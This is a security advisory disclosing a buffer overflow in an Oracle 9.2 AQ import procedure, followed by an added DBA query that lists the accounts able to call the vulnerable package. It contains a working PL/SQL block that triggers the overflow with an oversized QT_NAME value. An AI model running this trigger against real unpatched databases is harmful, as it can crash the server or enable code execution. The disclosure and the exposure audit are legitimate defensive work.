#27 - Buffer overflow in procedure AQ_TABLE_DEFN_UPDATE of DBMS_AQ_IMPORT_INTERNAL package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When the AQ_TABLE_DEFN_UPDATE procedure is called with a long string in the QT_NAME parameter, a buffer overflow occurs.
To reproduce the overflow, execute the following PL/SQL block:
DECLARE
  p_6_PRIMARY_INSTANCE   BINARY_INTEGER;
  p_7_SECONDARY_INSTANCE BINARY_INTEGER;
  AAA                    VARCHAR2(32767);
BEGIN
  -- Build an oversized string: 13 doublings give 8192 characters,
  -- the final concatenation of three copies gives 24576 characters.
  AAA := 'A';
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA || AAA;
  -- The long QT_NAME value is what triggers the overflow.
  SYS.DBMS_AQ_IMPORT_INTERNAL.AQ_TABLE_DEFN_UPDATE (
    QT_SCHEMA          => 'SYS',
    QT_NAME            => AAA,
    UDATA              => 1,
    QT_FLAGS           => 1,
    SORT_COLS          => 1,
    PRIMARY_INSTANCE   => p_6_PRIMARY_INSTANCE,
    SECONDARY_INSTANCE => p_7_SECONDARY_INSTANCE,
    COMMENT            => 'Y');
END;
/
Analysis:
This vulnerability can be exploited by members of any of the following roles: EXECUTE_CATALOG_ROLE, EXP_FULL_DATABASE, AQ_ADMINISTRATOR_ROLE and SYSDBA, as well as by any user granted EXECUTE permission on the DBMS_AQ_IMPORT_INTERNAL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.
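The roles and grants listed above define the set of principals that can reach the vulnerable procedure, so an administrator assessing exposure on an unpatched 9.2.x instance needs an inventory of exactly that set. The following query is an added example written for this page, not part of the original advisory or of Oracle's own tooling. It relies only on the standard data dictionary views DBA_TAB_PRIVS, DBA_ROLE_PRIVS, DBA_USERS and V$PWFILE_USERS and must be run by a DBA; the role names are the ones the advisory names, and nested role grants are followed so that users who receive one of those roles indirectly are also reported.

```sql
-- Added example (not from the advisory): who can reach
-- SYS.DBMS_AQ_IMPORT_INTERNAL on this instance? Run as a DBA.

-- 1. Confirm the patch level; the advisory gives 9.2.0.5 as the fix.
SELECT banner
  FROM v$version
 WHERE banner LIKE 'Oracle%';

-- 2. Direct EXECUTE grants on the package (users, roles or PUBLIC).
--    Any grant here that is not required is a candidate for REVOKE
--    until the patchset is applied.
SELECT grantee, grantor, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_AQ_IMPORT_INTERNAL'
   AND privilege = 'EXECUTE';

-- 3. Every principal that can reach the procedure: through the roles the
--    advisory names, through any role holding a direct EXECUTE grant
--    (nested role grants expanded with CONNECT BY), through a direct
--    grant, or through SYSDBA in the password file.
SELECT p.grantee,
       CASE
         WHEN u.username IS NOT NULL THEN 'USER'
         WHEN p.grantee = 'PUBLIC'   THEN 'PUBLIC'
         ELSE 'ROLE'
       END AS principal_type
  FROM (
        -- Members of the named roles, walking nested role grants outward:
        -- a child row's granted_role is the parent row's grantee.
        SELECT DISTINCT grantee
          FROM dba_role_privs
         START WITH granted_role IN ('EXECUTE_CATALOG_ROLE',
                                     'EXP_FULL_DATABASE',
                                     'AQ_ADMINISTRATOR_ROLE')
                 OR granted_role IN (SELECT grantee
                                       FROM dba_tab_privs
                                      WHERE owner = 'SYS'
                                        AND table_name = 'DBMS_AQ_IMPORT_INTERNAL'
                                        AND privilege = 'EXECUTE')
         CONNECT BY PRIOR grantee = granted_role
        UNION
        -- Direct grantees of the package.
        SELECT grantee
          FROM dba_tab_privs
         WHERE owner = 'SYS'
           AND table_name = 'DBMS_AQ_IMPORT_INTERNAL'
           AND privilege = 'EXECUTE'
        UNION
        -- SYSDBA holders recorded in the password file.
        SELECT username
          FROM v$pwfile_users
         WHERE sysdba = 'TRUE'
       ) p
  LEFT JOIN dba_users u ON u.username = p.grantee
 ORDER BY principal_type, p.grantee;
```

Rows typed USER are the accounts that matter for exposure; rows typed ROLE appear because the CONNECT BY walk also emits intermediate roles, and they are useful for seeing which grant chain gives a user access. A PUBLIC row in step 2 or 3 means every account on the instance can call the procedure, which is the case to remediate first, and the answer to step 1 decides whether the fix is simply to apply 9.2.0.5.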
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Oracle 10g is not vulnerable.